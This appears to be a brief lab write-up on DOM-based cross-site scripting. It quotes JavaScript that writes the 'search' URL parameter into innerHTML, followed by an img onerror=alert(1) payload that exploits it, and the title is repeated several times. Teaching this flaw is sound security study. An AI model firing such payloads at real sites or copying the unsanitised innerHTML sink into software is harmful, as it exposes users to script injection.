DOM XSS in `innerHTML` sink using source `location.search`¶

Vulnerable code from /?search=:

<script>
  function doSearchQuery(query) {
    document.getElementById('searchMessage').innerHTML = query;
  }
  var query = (new URLSearchParams(window.location.search)).get('search');
  if(query) {
    doSearchQuery(query);
  }
</script>

Payload: /?search="%27><img%20src%20onerror=alert(1)>1%27"<>

DOM XSS in innerHTML sink using source location.search¶

DOM XSS in `innerHTML` sink using source `location.search`¶